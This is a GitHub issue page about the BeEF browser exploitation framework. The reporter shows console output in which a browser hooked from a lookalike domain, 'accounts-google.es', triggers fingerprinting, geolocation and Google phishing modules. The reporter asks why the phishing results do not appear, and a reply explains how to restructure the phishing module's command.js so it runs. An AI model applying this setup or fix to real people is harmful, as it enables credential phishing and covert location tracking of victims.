You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
msf6 > sudo ./beef -x
[*] exec: sudo ./beef -x
...
[22:46:45][*] [ARE] Ruleset (Fingerprint Browser) parsed and stored successfully.
[22:46:45][*] [ARE] Ruleset (Get Geolocation HTML5 (jking)) parsed and stored successfully.
[22:46:45][*] [ARE] Ruleset (Google Phishing) parsed and stored successfully.
[22:46:45][*] BeEF server started (press control+c to stop)
[22:47:27][!] [Browser Details] Invalid browser name returned from the hook browser's initial connection.
[22:47:27][!] [Browser Details] Invalid browser version returned from the hook browser's initial connection.
[22:47:27][*] New Hooked Browser [id:1, ip:87.223.76.77, browser:UNKNOWN-124.0.0.0, os:Windows-10], hooked domain [[accounts-google.es:443](http://accounts-google.es:443/)]
[22:47:27][*] [ARE] Checking if any defined rules should be triggered on target.
[22:47:27] |_ Hooked browser and OS match rule: Fingerprint Browser.
[22:47:27] |_ Hooked browser and OS match rule: Get Geolocation HTML5 (jking).
[22:47:27] |_ Hooked browser and OS match rule: Google Phishing.
[22:47:27] |_ Found [3/3] ARE rules matching the hooked browser.
[22:47:27] |_ Preparing JS for command id [1], module [fingerprint_browser]
[22:47:27] |_ Triggering rules [1, 2, 3] on HB 1
[22:47:28] |_ Preparing JS for command id [2], module [get_geolocation_html5_jking]
[22:47:28] |_ Triggering rules [1, 2, 3] on HB 1
[22:47:28] |_ Preparing JS for command id [3], module [gmail_phishing]
[22:47:28] |_ Triggering rules [1, 2, 3] on HB 1
[22:47:30][*] Hooked browser [id:1, ip:87.223.76.77] has executed instructions (status: SUCCESS) from command module [cid:2, mod: 290, name:'Get Geolocation HTML5 (jking)']
[22:47:30][*] Hooked browser [id:1, ip:87.223.76.77] has executed instructions (status: SUCCESS) from command module [cid:1, mod: 291, name:'Fingerprint Browser']
Hooked host view is empty and panel shows that command has been executed???
Re-executing the command it shows properly.
Any clue about what is happening here? Thanks.
The text was updated successfully, but these errors were encountered:
Hi there! I got the solution a few hours ago. It's simple: all the functions visible in the command.js file must be placed within beef.execute(function(){/* code here */}). So, instead of separate calls to logoutGoogle(), displayingPhisingSite()... the associated code for those functions must take place within this function block.
First Steps
BeEF Version: 0.5.4.0
Ruby Version: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
Browser Details (e.g. Chrome v81.0): Causing problems with all I've tried (FF - 115.8.0esr, O - 108.0.5067.29, C - 123.0.6312.86, 123.0.6312.58, 121.0.6167.178)
Operating System: Linux, Windows and Android
Configuration
Steps to Reproduce
Any clue about what is happening here? Thanks.
The text was updated successfully, but these errors were encountered: